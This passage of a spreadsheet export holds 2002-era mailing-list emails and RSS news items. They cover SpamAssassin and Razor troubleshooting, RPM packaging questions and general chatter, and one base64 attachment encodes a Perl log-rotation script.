iB8\nfCBjaG1vZCgkb3B0X20sICRhKSB8fCBkaWUoImNobW9kKCRhKTogJCEiKTsKCX0KCgkjIHN1\nY2Nlc3MuCgkxOwp9Cgo7IyBSb3RhdGUgLSBkbyByZWFsIHdvcmsuCnN1YiBzYWZlX3JvdGF0\nZSB7Cglsb2NhbCgkYSkgPSBzaGlmdDsKCgkjIGNoZWNrIGV4aXN0ZW5jZSwgYW5kIHN1ZmZp\neGVzCglyZXR1cm4gMCB1bmxlc3MgJGEgbmUgJycgJiYgLWUgJGEgJiYgQF87CgoJIyBsb2cg\nbWVzc2FnZQoJJmRlYnVnKCJyb3RhdGluZyBcIiRhXCIiKTsKCgkjIHJlbW92ZSBvbGRlc3Qg\nb25lCglsb2NhbCgkYikgPSAkYS4nLicuc2hpZnQ7Cgkmc2FmZV91bmxpbmsoJGIpOwoJJnNh\nZmVfdW5saW5rKCRiLicuWicpOwoJJnNhZmVfdW5saW5rKCRiLicuZ3onKTsKCgkjIGxvb3Ag\ndG8gcm90YXRlIGZpbGVzCgl3aGlsZSAoQF8pIHsKCQlsb2NhbCgkeCkgPSAkYS4nLicuc2hp\nZnQ7CgkJJnNhZmVfcmVuYW1lKCR4LCAkYik7CgkJJnNhZmVfcmVuYW1lKCR4LicuWicsICRi\nLicuWicpOwoJCSZzYWZlX3JlbmFtZSgkeC4nLmd6JywgJGIuJy5neicpOwoJCSRiID0gJHg7\nCgl9CgoJIyByb3RhdGUgbGFzdCBvbmUKCSZzYWZlX3JlbmFtZSgkYSwgJGIpOwoKCSMgc2hh\nbGwgd2UgY29tcHJlc3Mgcm90YXRlZCBvbmU/Cgkkb3B0X3ogPyAmc2FmZV9nemlwKCRiKSA6\nICRvcHRfWiA/ICZzYWZlX2NvbXByZXNzKCRiKSA6IDE7Cn0K\n--------------050101050502080302080407--\n\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nRazor-users mailing list\nRazor-users@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: David Rees &lt;dbr@greenhydrant.com&gt;\nFrom: "Michael Duff" &lt;michael.duff@sri.com&gt;\nDate: Thu, 05 Sep 2002 16:37:47 -0700</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 16:37:47 -0700</t>
  </si>
  <si>
    <t>This is due to insufficient write privileges to the "razor-agent.log"  file. A quick work-around is to do a "chmod go+rx" on that file (of  course, it's better to restrict the access as much as possible). In Agent.pm, when the Razor2::Logger object is created, if it doesn't  have write permission to the log file it does not succeed. Then, later  in the code when the log object is used, it fails with the "unblessed"  error. Hope this helps, Michael Duff David Rees wrote: &gt;This is my first time running Razor, heard a lot of good things about it so &gt;I thought I'd give it a shot.  I also run SpamAssassin so I'd like to &gt;integrate the two. &gt; &gt;I'm not sure if this problem is with SpamAssassin or Razor, so I though I'd &gt;shoot the message here first &gt; &gt;With a freshly installed SpamAssassin 2.41 and Razor 2.14 I'm seeing these &gt;messages spit out from spamd: &gt; &gt;razor2 check skipped: No such file or directory Can't call method "log" on &gt;unblessed reference at /usr/lib/perl5/site_perl/5.6.0/Razor2/Client/Agent.pm &gt;line 211,  line 75. &gt; &gt;Any ideas?  razor seems to run correctly over the command line. &gt; &gt;Thanks, &gt;-Dave &gt; &gt; &gt;------------------------------------------------------- &gt;This sf.net email is sponsored by: OSDN - Tired of that same old &gt;cell phone?  Get a new here for FREE! &gt;[URL]https://www.inphonic.com[/URL] &gt;_______________________________________________ &gt;Razor-users mailing list &gt;Razor-users@lists.sourceforge.net &gt;[URL]https://lists.sourceforge.net[/URL] &gt;   &gt; ------------------------------------------------------- This sf.net email is sponsored by: OSDN - Tired of that same old cell phone?  Get a new here for FREE! [URL]https://www.inphonic.com[/URL] _______________________________________________ Razor-users mailing list Razor-users@lists.sourceforge.net [URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: exmh-users@spamassassin.taint.org\nFrom: Siva Doriaswamy &lt;siva@SandCraft.com&gt;\nDate: Thu, 05 Sep 2002 14:40:53 -0700</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 14:40:53 -0700</t>
  </si>
  <si>
    <t>Siva Doriaswamy &lt;siva@SandCraft.com&gt;</t>
  </si>
  <si>
    <t>Changed location of incoming mail. exmh not working!!</t>
  </si>
  <si>
    <t>I use exmh 2.5 with procmail for presorting incoming mail and move it to\nthe relevant folder using rcvstore.\n\nRecently, my incoming mail (or spool) location moved to another disk.\nI'm not quite clear how to reconfigure procmail/rcvstore/exmh to accept\nmail from the new location.\n\nThere seems to be a variable in exmh-defaults (bgspool). It says at the\ntop of the file not to edit these lines. So, I went ahead and edited it :-)\nThat does not make a difference.\n\nIt seems like procmail is the one that is actually reading the mail from\nmy spool/incoming mail area and piping it to rcvstore. So, I need to\nconfigure that probably.\n\nAny idea how I would do this?\n\nThanks\nSiva\n\n\n\n_______________________________________________\nExmh-users mailing list\nExmh-users@redhat.com\n[URL]https://listman.redhat.com[/URL]</t>
  </si>
  <si>
    <t>To: SpamAssassin &lt;spamassassin-talk@example.sourceforge.net&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 05 Sep 2002 12:26:25 +0100</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 12:26:25 +0100</t>
  </si>
  <si>
    <t>Re: [SAtalk] My SA went crazy.</t>
  </si>
  <si>
    <t>Jesus Climent said:\n\n&gt; d output: Bareword found where operator expected at (eval 11) line 95,\n&gt; near "25FREEMEGS_URL_uri_test"  (Missing operator before\n&gt; FREEMEGS_URL_uri_test?) Bareword found whe\n\n&gt; Is that a bug or is a fault in my system?\n\nlooks like there's an out-of-date copy of the rules files, on your system.\nthat rules is called "FREEMEGS_URL" nowadays.\n\n--j.\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Clark C . Evans" &lt;cce@clarkevans.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 05 Sep 2002 12:24:09 +0100</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 12:24:09 +0100</t>
  </si>
  <si>
    <t>"Clark C . Evans" &lt;cce@clarkevans.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] getting single-user spam assassin to work in FreeBSD</t>
  </si>
  <si>
    <t>"Clark C . Evans" said:\n\n&gt; Hello.  I'm hosted on a FreeBSD box where I can't modify the\n&gt; local Perl installation.  I downloaded and installed procmail\n&gt; in my home directory, and now I'm trying to get spamassassin to work...\n&gt; \n&gt; bash-2.05$ perl Makefile.PL PREFIX=/home/cce SYSCONFDIF=/home/cce/etc\n&gt; Warning: prerequisite HTML::Parser 0 not found at (eval 1) line 219.\n&gt; Warning: prerequisite Pod::Usage 0 not found at (eval 1) line 219.\n&gt; 'SYSCONFDIF' is not a known MakeMaker parameter name.\n\nSYSCONFDIR.\n\n--j.\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Kerry Nice" &lt;kerry_nice@hotmail.com&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 05 Sep 2002 12:21:59 +0100</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 12:21:59 +0100</t>
  </si>
  <si>
    <t>"Kerry Nice" &lt;kerry_nice@hotmail.com&gt;</t>
  </si>
  <si>
    <t>Re: [SAtalk] Trend: Spam disguised as newsletters</t>
  </si>
  <si>
    <t>"Kerry Nice" said:\n\n&gt; What about some reality check rules.  Yeah, you can pack in lots of things\n&gt; into the header to try and get some negative points, but do they all make\n&gt; sense in combination.  Can you have a Pine message id in the same header\n&gt; with an Outlook Express one or a Mutt User-Agent?\n\nYes, this is a big bonus of meta rules (new in 2.40); we can now\ne.g. check for an Outlook-style forwarded message, and not give\nit negative points unless it contains other signs of being from\nOutlook.\n\n&gt; I think the headers should be paid special attention to.  The message\n&gt; content of something from the NY Times or Lockergnome might look spammy, but\n&gt; usually they don't forge or fake anything in the header.  Tone down the\n&gt; negative scores and ding them extra for any obvious forgeries.\n\nWhen we get more (good) "nice" tests, the GA will assign lower\nscores to them.  I think the current problem is that there are\nvery few really good nice tests in the current rulebase, and lots\nof +ve tests that those newsletters hit, giving the GA a big\nproblem to solve.\n\n--j.\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SpamAssassin-talk@example.sourceforge.net\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 05 Sep 2002 12:15:35 +0100</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 12:15:35 +0100</t>
  </si>
  <si>
    <t>[SAtalk] Thought for RPM/deb/etc packagers</t>
  </si>
  <si>
    <t>BTW, I've been thinking a little about the RPMs and other packages.\nAlready the PLD guys are distributing 3 rpms:\n\n  - perl-Mail-SpamAssassin\n\n          the perl modules.\n\n  - spamassassin\n\n          the "spamassassin" and "spamd" scripts,\n          spamd rc-file etc.\n\n  - spamassassin-tools\n\n          mass-check, masses directory stuff, etc.\n          for generating rescore data from corpora.\n\nThis seems like a good way to do it; this way, stuff which just needs\nthe perl modules doesn't need to require the full RPM be installed,\nwith RC files in init.d etc.\n\nIt's been adopted in the distributed .spec file, anyway.\n\nTheo, BTW, what's the eval test you add in the tvd version of the RPM?\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by: OSDN - Tired of that same old\ncell phone?  Get a new here for FREE!\n[URL]https://www.inphonic.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: "FreshRPMs List" &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Thu, 05 Sep 2002 11:49:41 +0000</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 11:49:41 +0000</t>
  </si>
  <si>
    <t>"FreshRPMs List" &lt;rpm-zzzlist@freshrpms.net&gt;</t>
  </si>
  <si>
    <t>alsaplayer for (null)</t>
  </si>
  <si>
    <t>I spun another AlsaPlayer build, this time on my (null) box. I do not know what this means but the Curl stuff compiled in this time. It's sounding damn cool with the new alsa drivers. Thanks to Matthias for the Alsa RPMS. Great job bring sound to the masses. [URL]http://www.dudex.net[/URL] [URL]http://www.dudex.net[/URL] [URL]http://www.dudex.net[/URL] [URL]http://www.dudex.net[/URL] -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>http://www.dudex.net http://www.dudex.net http://www.dudex.net http://www.dudex.net http://lists.freshrpms.net</t>
  </si>
  <si>
    <t>To: scottm@crystal.ncc.cc.nm.us\nFrom: Crispin Cowan &lt;crispin@wirex.com&gt;\nDate: Thu, 05 Sep 2002 11:42:15 -0700</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 11:42:15 -0700</t>
  </si>
  <si>
    <t>scottm@crystal.ncc.cc.nm.us</t>
  </si>
  <si>
    <t>Re: FW: use of base image / delta image for automated recovery</t>
  </si>
  <si>
    <t>Scott MacKenzie wrote:\n\n&gt;There is a software package that is used (or was up through w2k) \n&gt;on MicroSloth for this purpose. Ghost, or some such. One essentially \n&gt;"takes a picture" of the machine's proper config, and then upon \n&gt;schedule or demand replaces the machine's current config with the \n&gt;proper picture. It essentially over-writes the entire disk drive. \n&gt;Especially good for student access machines at libraries, etc.\n&gt;\nAnd it is pretty common practice in some environments with public \nworkstations to just wipe and re-install Windows machines on a weekly \n(or even daily) basis. It's easier than trying to maintain Windows.\n\nCrispin\n\n-- \nCrispin Cowan, Ph.D.\nChief Scientist, WireX                      [URL]http://wirex.com[/URL]\nSecurity Hardened Linux Distribution:       [URL]http://immunix.org[/URL]\nAvailable for purchase: [URL]http://wirex.com[/URL]</t>
  </si>
  <si>
    <t>To: "FreshRPMs List" &lt;rpm-zzzlist@freshrpms.net&gt;\nFrom: "" Angles " Puglisi" &lt;angles@aminvestments.com&gt;\nDate: Thu, 05 Sep 2002 07:11:23 +0000</t>
  </si>
  <si>
    <t>Thu, 05 Sep 2002 07:11:23 +0000</t>
  </si>
  <si>
    <t>apt and a hybrid system</t>
  </si>
  <si>
    <t>Back when I had regular RH7.3 there was nothing better than "apt-get upgrade". But now I'm running (null) beta and I have these questions: which version of "apt" can I use, the RH7.3 version or the "rawhide" version? Is there a way to use apt to update (null) with the rpms available for (null) through up2date, since I prefer apt to that? If I can use apt, can I use it to get updates from these 3 different places: 1. the (null) up2date Redhat upgrades 2. the (null) files at Freshrpms.net 3. the regular RH7.3 files from freshrpms.net Am I asking for too much simplicity in this complicated world? -- That's "angle" as in geometry. _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: "Malte S. Stretz" &lt;msquadrat.nospamplease@gmx.net&gt;\nFrom: yyyy@spamassassin.taint.org (Justin Mason)\nDate: Thu, 03 Oct 2002 21:23:04 +0100</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 21:23:04 +0100</t>
  </si>
  <si>
    <t>Re: [SAtalk] 2.42: est release?</t>
  </si>
  <si>
    <t>Malte S. Stretz said:\n&gt; 1046 is fixed. But what about\n&gt; 1011 (add a notice about IRIX and -m to the docs),\n&gt; 1031 (cygwin's EXE_EXT),\n&gt; 1043 (a cosmetic but rather disturbing one ;-),\n\nall now fixed!\n\n&gt; 1004 (TO_MALFORMED borken),\n\nWONTFIX ;)\n\n&gt; 1006 (packaging related)?\n\neh, will leave this for 2.50. ;)\n\nOK, if there's nothing moderately serious shown up tonight, I'll release\nit tomorrow AM (GMT).\n\n--j.\n\n\n-------------------------------------------------------\nThis sf.net email is sponsored by:ThinkGeek\nWelcome to geek heaven.\n[URL]http://thinkgeek.com[/URL]\n_______________________________________________\nSpamassassin-talk mailing list\nSpamassassin-talk@lists.sourceforge.net\n[URL]https://lists.sourceforge.net[/URL]</t>
  </si>
  <si>
    <t>To: fork@spamassassin.taint.org\nFrom: "Stephen D. Williams" &lt;sdw@lig.net&gt;\nDate: Thu, 03 Oct 2002 17:32:56 -0400</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 17:32:56 -0400</t>
  </si>
  <si>
    <t>Living Love - Another legacy of the 60's</t>
  </si>
  <si>
    <t>Normally, I disdain any kind of mysticism, even when it is associated \nwith fairly good ideas.  Just a big turnoff.  A good example would be \nthe difference between Yoga/TM and the more scientifically pure, but \nrelated, relaxation techniques including "betagenics", \nhypnosis/auto-hypnosis, etc.  (This was one of the many topics I \nobsessively absorbed as a teenager.)  Or Tai Chi etc. vs. Tai Bo / \nG-Force Dyno-Staff.\n\nI have to say however that, having found this while looking for \nsomething completely unrelated, it has some cute truisms.  I \nparticularly like their addiction to non-addiction.  Additionally, the \nMindprod treehugger site has some interesting quotes, etc.\n\nTo my internal ear, nearly all of these 60's based new-age vernacular \nseem to assume that you are a simple child (of the 60's?) who needs some \nreligion-like couching of ideas to relate and internalize.  Very \nirritating, but taken in small doses it's interesting to compare and \ncontrast with our (my) modern mental models.\n\nI found that a few of the principles could be used to explain and \njustify US/UN foreign policy and actions.\n\n[URL]http://mindprod.com[/URL]\n[URL]http://members.aol.com[/URL]\n[URL]http://www.mindprod.com[/URL]\n(Apologies for the embedded HTML.)\n\nWe create the world we live in.\nA loving person lives in a loving world,\nA hostile person lives in a hostile world.\nEveryone you meet is your mirror.\n\nYou make yourself and others suffer just as much when you take offence \nas when you give offence. To be upset over what you don't have is to \nwaste what you do have.\n\nThe past is dead,\nThe future is imaginary,\nHappiness can only be\nin the Eternal Now Moment\n\nHow soon will you realize that the only thing you don't have is the \ndirect experience that there's nothing you need that you don't have.\n\nLove a person because he or she is there.\nThis is the only reason.\n\nHappiness happens when your consciousness is not dominated by addictions \nand demands~ and you experience life as a parade of preferences.\n\nThe\npurpose\nof our lives\nis to be free\nof all addictive traps,\nand thus\nbecome one\nwith the ocean of\nLiving Love.\n\n\nsdw\n\n-- \nsdw@lig.net [URL]http://sdw.st[/URL]\nStephen D. Williams 43392 Wayside Cir,Ashburn,VA 20147-4622\n703-724-0118W 703-995-0407Fax Dec2001</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: "C.Lee Taylor" &lt;leet@leenx.co.za&gt;\nDate: Thu, 03 Oct 2002 13:02:29 +0200</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 13:02:29 +0200</t>
  </si>
  <si>
    <t>Re: alsa-driver.spec tweak for homemade kernels ...</t>
  </si>
  <si>
    <t>&gt;&gt; &gt; Well, I don't really find it consistent at all to use an rpm package  &gt;&gt; &gt; built against something that wasn't installed through rpm :-/  &gt;&gt;  &gt;&gt; Following that reasoning, I've been installing all my custom-built  &gt;&gt; kernels through rpm recently. I find it annoying, though, that  &gt;&gt; alsa-kernel, and similar packages, will only build for the currently  &gt;&gt; running kernel.  &gt;&gt;  &gt;&gt; So I've attached a patch to specify an alternate kernel by setting the  &gt;&gt; "TARGET_KERNEL" environment variable before running rpmbuild. You  &gt;&gt; still need to have the rpm for the specified kernel installed, but at  &gt;&gt; least it doesn't have to be currently running. It's kinda hackish, so  &gt;&gt; if someone has a better way to do this, let me know.  &gt;  &gt;That idea looks good although it maybe needs to be tweaked a bit more (what  &gt;you sent doesn't support packages named "kernel-smp"). I'd also prefer a  &gt;cleaner way than the env variable, and preferrably not editing the spec...  &gt;probably "--define 'target 2.4.xx-xx' --with smp". Sound good enough?  &gt;The BuildRequires on "kernel-source" will also need to be removed because  &gt;it won't necessarily need to be true, and that does bug me a bit :-/ 	Me and my kernel rpm builds ... this all works along the same idea I have  been aiming for, but the freaking RedHat Kernel srpms still have been stump  ... 	If we could get this and the alsa driver stuff working, it would be whole  lot easier to try out a newer kernel ... but then the size of these rpms  are huge, at least for us n^1 world courties ... ;-{ ... 	I will keep watching and hoping that somebody comes up with a great working  idea ... Thanks guys. Mailed Lee _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: Flatware or Road Kill? &lt;FoRK@xent.com&gt;\nFrom: Rodent of Unusual Size &lt;Ken.Coar@Golux.Com&gt;\nDate: Thu, 03 Oct 2002 12:53:34 -0400</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 12:53:34 -0400</t>
  </si>
  <si>
    <t>people with too much time on their hands..\n\nlook at this first (8meg, so takes a loong time):\n\n[URL]http://www.ntk.net[/URL]\n\nand then look at this reduction:\n\n[URL]http://www.ntk.net[/URL]\n-- \n#ken	P-)}\n\nKen Coar, Sanagendamgagwedweinini  [URL]http://Golux.Com[/URL]\nAuthor, developer, opinionist      [URL]http://Apache-Server.Com[/URL]\n\n"Millennium hand and shrimp!"</t>
  </si>
  <si>
    <t>http://www.ntk.net http://www.ntk.net http://Golux.Com http://Apache-Server.Com</t>
  </si>
  <si>
    <t>To: rpm-zzzlist@freshrpms.net\nFrom: Roi Dayan &lt;dejavo@punkass.com&gt;\nDate: Thu, 03 Oct 2002 10:05:46 +0300</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 10:05:46 +0300</t>
  </si>
  <si>
    <t>Mplayer</t>
  </si>
  <si>
    <t>Hey Since I upgraded to redhat8 mplayer -vo sdl isnt working for me It gives me black screen and I only hear sound. can anyone help me with this ? btw, also the source rpm specified that I can do --without libdv but it didn't work, worked for lirc and arts. Thanks, Roi _______________________________________________ RPM-List mailing list  [URL]http://lists.freshrpms.net[/URL]</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:03:14 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:03:14 -0000</t>
  </si>
  <si>
    <t>Fatal seal epidemic burns out</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8473772,1440/\nDate: Not supplied\n\nAnd so many North Sea harbour seals have been killed that a repeat outbreak in \nthe 2003 breeding season is highly unlikely</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:03:12 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:03:12 -0000</t>
  </si>
  <si>
    <t>Hurricane Lili closes shuttle Mission Control</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8477945,1440/\nDate: Not supplied\n\nThe launch is postponed until at least Monday - the first time bad weather in \nHouston has delayed a shuttle flight</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:03:11 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:03:11 -0000</t>
  </si>
  <si>
    <t>Marriage makes both sexes happy</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8483157,1440/\nDate: Not supplied\n\nContrary to popular belief, a new study shows women receive the same mental \nhealth boost from marriage as men</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:03:09 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:03:09 -0000</t>
  </si>
  <si>
    <t>Quantum cryptography takes to the skies</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8483156,1440/\nDate: Not supplied\n\nKeys encoded in photons of light are sent 23 kilometres through air, an \nimportant step towards a secure global communications system</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: newscientist &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:03:06 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:03:06 -0000</t>
  </si>
  <si>
    <t>Warplane system 'could stop mid-air explosions'</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8483155,1440/\nDate: Not supplied\n\nAirlines are facing fresh calls to fit fuel tank inerting systems, following \nwarnings from Boeing about potentially faulty fuel pumps</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:51 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:51 -0000</t>
  </si>
  <si>
    <t>Wed. OSXCon Keynote -- Jordan Hubbard</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-02T09:34:00-08:00\n\nTalking about his mainframe background and roots in computing. He played a lot \non the big iron and sorta "missed" the PC revolution. He wasn't terribly \ninterested in PCs for quite a while. Then he got to play with one...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:45 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:45 -0000</t>
  </si>
  <si>
    <t>Wed. OSXCon Panel Discussion</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-02T10:09:11-08:00\n\nWhich was the better UI? Mac OS 9? Mac OS X? Windows? Nobody can agree. Tim \nO'Reilly didn't like Mac OS 9. He gets OS X. Traditional Mac users are a bit \nannoyed by OS X. They think it's a...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:44 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:44 -0000</t>
  </si>
  <si>
    <t>OSXCon Wed. -- James Gosling</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-02T16:04:06-08:00\n\nJava has been successful everywhere but the desktop. Or at least that's what \npeople here. It's big on the server and that downs out the desktop news. What \nelse went wrong? Applets. Microsoft's battle with Java. For the longest \ntime,...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:43 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:43 -0000</t>
  </si>
  <si>
    <t>OSXCon: Development Lessons from Bare Bones Software</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-02T17:02:15-08:00\n\nThis talk is not supposed to be technical or marketing, but more of a ramble. \nWe'll see. :-) "Living above the Curve" BB is a strange company, as they've \nbeen Mac-only are have been in business for over 10 years....</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:41 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:41 -0000</t>
  </si>
  <si>
    <t>Job Offers and My Resume</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-02T22:22:55-08:00\n\nThe business news of the day has long been telling us that we're in a very slow \neconomic period. Yet I've received multiple job solicitations recently. Not \nrandom head-hunters or anything. People I know, who know me relatively well, \nwant...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:40 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:40 -0000</t>
  </si>
  <si>
    <t>Perl.  It's just a language.</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-02T22:52:53-08:00\n\nI realized something the other day. I've been programming in Perl for roughly \nseven or eight years now. Maybe nine. It's hard to remember for sure. But at \nsome point it lost its shine. It used to be a lot...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:36 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:36 -0000</t>
  </si>
  <si>
    <t>Not Many OS X Conference Blogs</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-02T23:30:23-08:00\n\nAs noted in the inluminent weblog there don't seem to be many bloggers at \nOSXCon. At least they're not blogging. That's rather disappointing. They were \nstrong at OSCON and the Emerging Technologies Conference (damn, I wish I had \nthe foresight...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: zawodny &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:35 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:35 -0000</t>
  </si>
  <si>
    <t>On Windley's Radar Too</t>
  </si>
  <si>
    <t>URL: [URL]http://jeremy.zawodny.com[/URL]\nDate: 2002-10-03T00:24:56-08:00\n\nLast week, I noticed that I was on Dave's radar. Now that I've caught up on \nblogging, it seems that I'm on Windley's radar too. He picked up on my \nFreeBSD/Linux MySQL story and that provoked an interesting discussion of...</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:21 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:21 -0000</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],11,215/\nDate: 2002-10-01T12:41:57+01:00\n\n*Live online:* The Observer's *Tracy McVeigh* and experts *Tim Brighouse* and *\nAnn Hodgson* will be here on Thursday at 3pm to discuss the government's \nrecord. Post your questions now.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:20 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:20 -0000</t>
  </si>
  <si>
    <t>TV democracy in action</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],10,215/\nDate: 2002-10-02T18:11:03+01:00\n\n*Rio dispatch: *18,880 candidates standing in the Brazilian elections get a \nparty political broadcast each, says *Alex Bellos*.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:18 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:18 -0000</t>
  </si>
  <si>
    <t>300,000 exams to be reviewed</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],9,215/\nDate: 2002-10-03T04:20:58+01:00\n\n*Education:* The scale of this year's A-level crisis is even worse than \nexpected, the inquiry into claims of "grade fixing" has revealed.</t>
  </si>
  <si>
    <t>To: yyyy@spamassassin.taint.org\nFrom: guardian &lt;rssfeeds@spamassassin.taint.org&gt;\nDate: Thu, 03 Oct 2002 08:02:12 -0000</t>
  </si>
  <si>
    <t>Thu, 03 Oct 2002 08:02:12 -0000</t>
  </si>
  <si>
    <t>Robbie Williams signs 80m deal</t>
  </si>
  <si>
    <t>URL: [URL]http://www.newsisfree.com[/URL],8,215/\nDate: 2002-10-03T04:20:59+01:00\n\n*Arts:* Robbie Williams has become one of the highest paid singers in the \nworld.</t>
  </si>
  <si>
